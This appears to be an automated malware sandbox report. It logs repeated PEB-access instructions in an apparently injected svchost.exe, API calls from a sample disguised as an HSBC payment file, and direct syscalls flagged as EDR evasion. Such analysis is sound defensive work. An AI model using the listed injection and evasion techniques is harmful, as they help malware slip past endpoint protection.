Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]	2_2_03A04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]	2_2_03A04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]	2_2_03A04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]	2_2_03A04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]	2_2_03A04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]	2_2_03940535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]	2_2_03940535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]	2_2_03940535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]	2_2_03940535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]	2_2_03940535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]	2_2_03940535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]	2_2_0395E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]	2_2_0395E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]	2_2_0395E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]	2_2_0395E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]	2_2_0395E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03938550 mov eax, dword ptr fs:[00000030h]	2_2_03938550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03938550 mov eax, dword ptr fs:[00000030h]	2_2_03938550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]	2_2_0396656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]	2_2_0396656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]	2_2_0396656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039EA49A mov eax, dword ptr fs:[00000030h]	2_2_039EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039644B0 mov ecx, dword ptr fs:[00000030h]	2_2_039644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039BA4B0 mov eax, dword ptr fs:[00000030h]	2_2_039BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039364AB mov eax, dword ptr fs:[00000030h]	2_2_039364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039304E5 mov ecx, dword ptr fs:[00000030h]	2_2_039304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]	2_2_03968402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]	2_2_03968402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]	2_2_03968402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396A430 mov eax, dword ptr fs:[00000030h]	2_2_0396A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]	2_2_0392E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]	2_2_0392E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]	2_2_0392E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0392C427 mov eax, dword ptr fs:[00000030h]	2_2_0392C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]	2_2_039B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]	2_2_039B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]	2_2_039B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]	2_2_039B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]	2_2_039B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]	2_2_039B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]	2_2_039B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039EA456 mov eax, dword ptr fs:[00000030h]	2_2_039EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0392645D mov eax, dword ptr fs:[00000030h]	2_2_0392645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395245A mov eax, dword ptr fs:[00000030h]	2_2_0395245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]	2_2_0396E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]	2_2_0396E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]	2_2_0396E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]	2_2_0396E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]	2_2_0396E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]	2_2_0396E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]	2_2_0396E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]	2_2_0396E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]	2_2_0395A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]	2_2_0395A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]	2_2_0395A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039BC460 mov ecx, dword ptr fs:[00000030h]	2_2_039BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940BBE mov eax, dword ptr fs:[00000030h]	2_2_03940BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940BBE mov eax, dword ptr fs:[00000030h]	2_2_03940BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_039E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_039E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DEBD0 mov eax, dword ptr fs:[00000030h]	2_2_039DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]	2_2_03950BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]	2_2_03950BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]	2_2_03950BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]	2_2_03930BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]	2_2_03930BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]	2_2_03930BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]	2_2_03938BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]	2_2_03938BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]	2_2_03938BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395EBFC mov eax, dword ptr fs:[00000030h]	2_2_0395EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039BCBF0 mov eax, dword ptr fs:[00000030h]	2_2_039BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]	2_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]	2_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]	2_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]	2_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]	2_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]	2_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]	2_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]	2_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]	2_2_039AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A04B00 mov eax, dword ptr fs:[00000030h]	2_2_03A04B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395EB20 mov eax, dword ptr fs:[00000030h]	2_2_0395EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395EB20 mov eax, dword ptr fs:[00000030h]	2_2_0395EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039F8B28 mov eax, dword ptr fs:[00000030h]	2_2_039F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039F8B28 mov eax, dword ptr fs:[00000030h]	2_2_039F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03928B50 mov eax, dword ptr fs:[00000030h]	2_2_03928B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DEB50 mov eax, dword ptr fs:[00000030h]	2_2_039DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039E4B4B mov eax, dword ptr fs:[00000030h]	2_2_039E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039E4B4B mov eax, dword ptr fs:[00000030h]	2_2_039E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039C6B40 mov eax, dword ptr fs:[00000030h]	2_2_039C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039C6B40 mov eax, dword ptr fs:[00000030h]	2_2_039C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039FAB40 mov eax, dword ptr fs:[00000030h]	2_2_039FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039D8B42 mov eax, dword ptr fs:[00000030h]	2_2_039D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0392CB7E mov eax, dword ptr fs:[00000030h]	2_2_0392CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]	2_2_03A02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]	2_2_03A02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]	2_2_03A02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]	2_2_03A02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03968A90 mov edx, dword ptr fs:[00000030h]	2_2_03968A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]	2_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]	2_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]	2_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]	2_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]	2_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]	2_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]	2_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]	2_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]	2_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A04A80 mov eax, dword ptr fs:[00000030h]	2_2_03A04A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03938AA0 mov eax, dword ptr fs:[00000030h]	2_2_03938AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03938AA0 mov eax, dword ptr fs:[00000030h]	2_2_03938AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03986AA4 mov eax, dword ptr fs:[00000030h]	2_2_03986AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03930AD0 mov eax, dword ptr fs:[00000030h]	2_2_03930AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03964AD0 mov eax, dword ptr fs:[00000030h]	2_2_03964AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03964AD0 mov eax, dword ptr fs:[00000030h]	2_2_03964AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]	2_2_03986ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]	2_2_03986ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]	2_2_03986ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396AAEE mov eax, dword ptr fs:[00000030h]	2_2_0396AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396AAEE mov eax, dword ptr fs:[00000030h]	2_2_0396AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039BCA11 mov eax, dword ptr fs:[00000030h]	2_2_039BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03954A35 mov eax, dword ptr fs:[00000030h]	2_2_03954A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03954A35 mov eax, dword ptr fs:[00000030h]	2_2_03954A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396CA38 mov eax, dword ptr fs:[00000030h]	2_2_0396CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396CA24 mov eax, dword ptr fs:[00000030h]	2_2_0396CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395EA2E mov eax, dword ptr fs:[00000030h]	2_2_0395EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]	2_2_03936A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]	2_2_03936A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]	2_2_03936A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]	2_2_03936A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]	2_2_03936A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]	2_2_03936A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]	2_2_03936A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940A5B mov eax, dword ptr fs:[00000030h]	2_2_03940A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940A5B mov eax, dword ptr fs:[00000030h]	2_2_03940A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039ACA72 mov eax, dword ptr fs:[00000030h]	2_2_039ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039ACA72 mov eax, dword ptr fs:[00000030h]	2_2_039ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]	2_2_0396CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]	2_2_0396CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]	2_2_0396CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DEA60 mov eax, dword ptr fs:[00000030h]	2_2_039DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B89B3 mov esi, dword ptr fs:[00000030h]	2_2_039B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B89B3 mov eax, dword ptr fs:[00000030h]	2_2_039B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B89B3 mov eax, dword ptr fs:[00000030h]	2_2_039B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]	2_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]	2_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]	2_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]	2_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]	2_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]	2_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]	2_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]	2_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]	2_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]	2_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]	2_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]	2_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]	2_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039309AD mov eax, dword ptr fs:[00000030h]	2_2_039309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039309AD mov eax, dword ptr fs:[00000030h]	2_2_039309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0393A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0393A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0393A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0393A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0393A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0393A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039649D0 mov eax, dword ptr fs:[00000030h]	2_2_039649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039FA9D3 mov eax, dword ptr fs:[00000030h]	2_2_039FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039C69C0 mov eax, dword ptr fs:[00000030h]	2_2_039C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039629F9 mov eax, dword ptr fs:[00000030h]	2_2_039629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039629F9 mov eax, dword ptr fs:[00000030h]	2_2_039629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039BE9E0 mov eax, dword ptr fs:[00000030h]	2_2_039BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039BC912 mov eax, dword ptr fs:[00000030h]	2_2_039BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03928918 mov eax, dword ptr fs:[00000030h]	2_2_03928918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03928918 mov eax, dword ptr fs:[00000030h]	2_2_03928918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039AE908 mov eax, dword ptr fs:[00000030h]	2_2_039AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039AE908 mov eax, dword ptr fs:[00000030h]	2_2_039AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B892A mov eax, dword ptr fs:[00000030h]	2_2_039B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039C892B mov eax, dword ptr fs:[00000030h]	2_2_039C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B0946 mov eax, dword ptr fs:[00000030h]	2_2_039B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A04940 mov eax, dword ptr fs:[00000030h]	2_2_03A04940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039D4978 mov eax, dword ptr fs:[00000030h]	2_2_039D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039D4978 mov eax, dword ptr fs:[00000030h]	2_2_039D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039BC97C mov eax, dword ptr fs:[00000030h]	2_2_039BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]	2_2_03956962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]	2_2_03956962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]	2_2_03956962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0397096E mov eax, dword ptr fs:[00000030h]	2_2_0397096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0397096E mov edx, dword ptr fs:[00000030h]	2_2_0397096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0397096E mov eax, dword ptr fs:[00000030h]	2_2_0397096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039BC89D mov eax, dword ptr fs:[00000030h]	2_2_039BC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03930887 mov eax, dword ptr fs:[00000030h]	2_2_03930887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395E8C0 mov eax, dword ptr fs:[00000030h]	2_2_0395E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A008C0 mov eax, dword ptr fs:[00000030h]	2_2_03A008C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0396C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0396C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039FA8E4 mov eax, dword ptr fs:[00000030h]	2_2_039FA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039BC810 mov eax, dword ptr fs:[00000030h]	2_2_039BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]	2_2_03952835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]	2_2_03952835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]	2_2_03952835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03952835 mov ecx, dword ptr fs:[00000030h]	2_2_03952835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]	2_2_03952835

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe

Code function: 0_2_007780A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_007780A9

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_0074A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_0074A155
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_0074A124 SetUnhandledExceptionFilter,		0_2_0074A124

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	NtResumeThread: Direct from: 0x773836AC	Jump to behavior
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	NtMapViewOfSection: Direct from: 0x77382D1C	Jump to behavior
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	NtWriteVirtualMemory: Direct from: 0x77382E3C	Jump to behavior
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	NtProtectVirtualMemory: Direct from: 0x77382F9C	Jump to behavior
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	NtSetInformationThread: Direct from: 0x773763F9	Jump to behavior
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	NtCreateMutant: Direct from: 0x773835CC	Jump to behavior
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	NtNotifyChangeKey: Direct from: 0x77383C2C	Jump to behavior
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	NtSetInformationProcess: Direct from: 0x77382C5C	Jump to behavior
